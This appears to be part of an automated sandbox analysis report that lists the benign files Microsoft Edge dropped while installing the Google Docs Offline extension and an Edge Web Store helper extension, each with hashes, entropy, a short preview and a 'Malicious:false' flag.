                                                                                                                                                                                                                                                                                                                        Size (bytes):843
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):11280
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                                                        MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                                                        SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                                                        SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                                                        SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2525
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                                                        MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                                                        SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                                                        SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                                                        SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):98880
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                                                        MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                                                        SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                                                        SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                                                        SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):291
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):107677
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                                                        MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                                                        SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                                                        SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                                                        SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1738678458\2eec05b6-d336-4995-b720-cda0de21ea96.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1738678458\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1738678458\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):9815
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1738678458\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):10388
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                        Malicious:false
